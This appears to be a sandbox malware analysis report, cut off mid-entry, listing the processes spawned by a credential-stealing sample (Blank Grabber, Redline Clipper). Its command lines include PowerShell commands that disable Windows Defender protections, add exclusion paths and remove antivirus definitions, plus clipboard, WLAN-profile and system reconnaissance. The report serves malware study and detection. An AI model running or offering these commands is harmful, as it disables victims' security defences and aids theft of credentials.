                                                            2024-09-09 04:31:28 UTC344INHTTP/1.1 403 Forbidden
                                                            Server: nginx/1.18.0
                                                            Date: Mon, 09 Sep 2024 04:31:28 GMT
                                                            Content-Type: application/json
                                                            Content-Length: 93
                                                            Connection: close
                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                            Access-Control-Allow-Origin: *
                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection


                                                            Statistics

                                                            CPU Usage

                                                            Click to jump to process

                                                            Memory Usage

                                                            Click to jump to process

                                                            High Level Behavior Distribution

                                                            Click to dive into process behavior distribution

                                                            Behavior

                                                            Click to jump to process

                                                            System Behavior

                                                            General

                                                            Target ID:0
                                                            Start time:00:30:55
                                                            Start date:09/09/2024
                                                            Path:C:\Users\user\Desktop\Update.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Users\user\Desktop\Update.exe"
                                                            Imagebase:0x7ff623f70000
                                                            File size:8'514'937 bytes
                                                            MD5 hash:AAB47056DE8F4BA6869EAFAE3A5EBA7B
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000000.00000003.1665851600.0000019DCB065000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000000.00000003.1665851600.0000019DCB063000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                            Reputation:low
                                                            Has exited:true

                                                            General

                                                            Target ID:1
                                                            Start time:00:30:56
                                                            Start date:09/09/2024
                                                            Path:C:\Users\user\Desktop\Update.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Users\user\Desktop\Update.exe"
                                                            Imagebase:0x7ff623f70000
                                                            File size:8'514'937 bytes
                                                            MD5 hash:AAB47056DE8F4BA6869EAFAE3A5EBA7B
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000001.00000002.1982892072.000002D8F5F80000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.1982892072.000002D8F5F80000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000001.00000003.1978245137.000002D8F6B8A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000001.00000003.1677786789.000002D8F6114000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000001.00000002.1983440735.000002D8F6364000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000001.00000003.1678909991.000002D8F6139000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000001.00000003.1979523024.000002D8F6364000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                            Reputation:low
                                                            Has exited:true

                                                            General

                                                            Target ID:2
                                                            Start time:00:30:57
                                                            Start date:09/09/2024
                                                            Path:C:\Windows\System32\cmd.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Update.exe'"
                                                            Imagebase:0x7ff67e6f0000
                                                            File size:289'792 bytes
                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:3
                                                            Start time:00:30:57
                                                            Start date:09/09/2024
                                                            Path:C:\Windows\System32\cmd.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                                                            Imagebase:0x7ff67e6f0000
                                                            File size:289'792 bytes
                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:4
                                                            Start time:00:30:57
                                                            Start date:09/09/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff7699e0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:5
                                                            Start time:00:30:57
                                                            Start date:09/09/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff7699e0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:6
                                                            Start time:00:30:58
                                                            Start date:09/09/2024
                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Update.exe'
                                                            Imagebase:0x7ff788560000
                                                            File size:452'608 bytes
                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:7
                                                            Start time:00:30:58
                                                            Start date:09/09/2024
                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                                                            Imagebase:0x7ff788560000
                                                            File size:452'608 bytes
                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:8
                                                            Start time:00:30:58
                                                            Start date:09/09/2024
                                                            Path:C:\Windows\System32\cmd.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\bound.exe'"
                                                            Imagebase:0x7ff67e6f0000
                                                            File size:289'792 bytes
                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:9
                                                            Start time:00:30:58
                                                            Start date:09/09/2024
                                                            Path:C:\Windows\System32\cmd.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\cmd.exe /c "start bound.exe"
                                                            Imagebase:0x7ff67e6f0000
                                                            File size:289'792 bytes
                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:10
                                                            Start time:00:30:58
                                                            Start date:09/09/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff7699e0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:11
                                                            Start time:00:30:58
                                                            Start date:09/09/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff7699e0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:12
                                                            Start time:00:30:58
                                                            Start date:09/09/2024
                                                            Path:C:\Windows\System32\cmd.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? ?.scr'"
                                                            Imagebase:0x7ff67e6f0000
                                                            File size:289'792 bytes
                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:13
                                                            Start time:00:30:58
                                                            Start date:09/09/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff7699e0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:14
                                                            Start time:00:30:58
                                                            Start date:09/09/2024
                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\bound.exe'
                                                            Imagebase:0x7ff788560000
                                                            File size:452'608 bytes
                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:15
                                                            Start time:00:30:58
                                                            Start date:09/09/2024
                                                            Path:C:\Users\user\AppData\Local\Temp\bound.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:bound.exe
                                                            Imagebase:0x400000
                                                            File size:2'740'224 bytes
                                                            MD5 hash:3932062DD4DCEDBD1EEAE026F8E8B562
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_RedlineClipper, Description: Yara detected Redline Clipper, Source: 0000000F.00000002.1703505307.0000000003250000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                            Has exited:true

                                                            General

                                                            Target ID:16
                                                            Start time:00:30:58
                                                            Start date:09/09/2024
                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? ?.scr'
                                                            Imagebase:0x7ff788560000
                                                            File size:452'608 bytes
                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:17
                                                            Start time:00:30:59
                                                            Start date:09/09/2024
                                                            Path:C:\Users\user\AppData\Local\Temp\Build.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Users\user\AppData\Local\Temp\Build.exe"
                                                            Imagebase:0x7ff633fe0000
                                                            File size:2'657'280 bytes
                                                            MD5 hash:1505B202551976B8543C4B233F50FCA8
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Antivirus matches:
                                                            • Detection: 92%, ReversingLabs
                                                            Has exited:true

                                                            General

                                                            Target ID:18
                                                            Start time:00:30:59
                                                            Start date:09/09/2024
                                                            Path:C:\Windows\System32\cmd.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                            Imagebase:0x7ff67e6f0000
                                                            File size:289'792 bytes
                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:19
                                                            Start time:00:30:59
                                                            Start date:09/09/2024
                                                            Path:C:\Windows\System32\cmd.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                            Imagebase:0x7ff67e6f0000
                                                            File size:289'792 bytes
                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:20
                                                            Start time:00:30:59
                                                            Start date:09/09/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff7699e0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:21
                                                            Start time:00:30:59
                                                            Start date:09/09/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff7699e0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:22
                                                            Start time:00:30:59
                                                            Start date:09/09/2024
                                                            Path:C:\Windows\System32\tasklist.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:tasklist /FO LIST
                                                            Imagebase:0x7ff7cd360000
                                                            File size:106'496 bytes
                                                            MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:23
                                                            Start time:00:30:59
                                                            Start date:09/09/2024
                                                            Path:C:\Users\user\AppData\Local\Temp\lf6o4T3T.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\user\AppData\Local\Temp\lf6o4T3T.exe"
                                                            Imagebase:0x970000
                                                            File size:77'824 bytes
                                                            MD5 hash:D4111CF483F20E0911E201EB512D0B75
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_RedlineClipper, Description: Yara detected Redline Clipper, Source: 00000017.00000000.1700631224.0000000000972000.00000002.00000001.01000000.00000018.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_RedlineClipper, Description: Yara detected Redline Clipper, Source: C:\Users\user\AppData\Local\Temp\lf6o4T3T.exe, Author: Joe Security
                                                            Has exited:false

                                                            General

                                                            Target ID:24
                                                            Start time:00:30:59
                                                            Start date:09/09/2024
                                                            Path:C:\Windows\System32\tasklist.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:tasklist /FO LIST
                                                            Imagebase:0x7ff7cd360000
                                                            File size:106'496 bytes
                                                            MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:25
                                                            Start time:00:30:59
                                                            Start date:09/09/2024
                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                            Imagebase:0x7ff788560000
                                                            File size:452'608 bytes
                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:26
                                                            Start time:00:30:59
                                                            Start date:09/09/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff7699e0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:27
                                                            Start time:00:31:00
                                                            Start date:09/09/2024
                                                            Path:C:\Windows\System32\cmd.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
                                                            Imagebase:0x7ff67e6f0000
                                                            File size:289'792 bytes
                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:28
                                                            Start time:00:31:01
                                                            Start date:09/09/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff7699e0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:29
                                                            Start time:00:31:01
                                                            Start date:09/09/2024
                                                            Path:C:\Windows\System32\cmd.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
                                                            Imagebase:0x7ff67e6f0000
                                                            File size:289'792 bytes
                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:30
                                                            Start time:00:31:01
                                                            Start date:09/09/2024
                                                            Path:C:\Windows\System32\wbem\WMIC.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
                                                            Imagebase:0x7ff745ed0000
                                                            File size:576'000 bytes
                                                            MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:31
                                                            Start time:00:31:01
                                                            Start date:09/09/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff7699e0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:32
                                                            Start time:00:31:01
                                                            Start date:09/09/2024
                                                            Path:C:\Windows\System32\cmd.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                            Imagebase:0x7ff67e6f0000
                                                            File size:289'792 bytes
                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:33
                                                            Start time:00:31:01
                                                            Start date:09/09/2024
                                                            Path:C:\Windows\System32\cmd.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                            Imagebase:0x7ff67e6f0000
                                                            File size:289'792 bytes
                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:34
                                                            Start time:00:31:01
                                                            Start date:09/09/2024
                                                            Path:C:\Windows\System32\cmd.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
                                                            Imagebase:0x7ff67e6f0000
                                                            File size:289'792 bytes
                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:35
                                                            Start time:00:31:01
                                                            Start date:09/09/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff7699e0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:36
                                                            Start time:00:31:01
                                                            Start date:09/09/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff7699e0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:37
                                                            Start time:00:31:01
                                                            Start date:09/09/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff7699e0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:38
                                                            Start time:00:31:02
                                                            Start date:09/09/2024
                                                            Path:C:\Windows\System32\tree.com
                                                            Wow64 process (32bit):false
                                                            Commandline:tree /A /F
                                                            Imagebase:0x7ff604c70000
                                                            File size:20'992 bytes
                                                            MD5 hash:9EB969EF56718A6243BF60350CD065F0
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:39
                                                            Start time:00:31:02
                                                            Start date:09/09/2024
                                                            Path:C:\Windows\System32\tasklist.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:tasklist /FO LIST
                                                            Imagebase:0x7ff7cd360000
                                                            File size:106'496 bytes
                                                            MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:40
                                                            Start time:00:31:02
                                                            Start date:09/09/2024
                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:powershell Get-Clipboard
                                                            Imagebase:0x7ff788560000
                                                            File size:452'608 bytes
                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:41
                                                            Start time:00:31:02
                                                            Start date:09/09/2024
                                                            Path:C:\Windows\System32\netsh.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:netsh wlan show profile
                                                            Imagebase:0x7ff6d2500000
                                                            File size:96'768 bytes
                                                            MD5 hash:6F1E6DD688818BC3D1391D0CC7D597EB
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:42
                                                            Start time:00:31:04
                                                            Start date:09/09/2024
                                                            Path:C:\Windows\System32\cmd.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\cmd.exe /c "systeminfo"
                                                            Imagebase:0x7ff67e6f0000
                                                            File size:289'792 bytes
                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:43
                                                            Start time:00:31:04
                                                            Start date:09/09/2024
                                                            Path:C:\Windows\System32\cmd.exe
                                                            Wow64 process (32bit):false
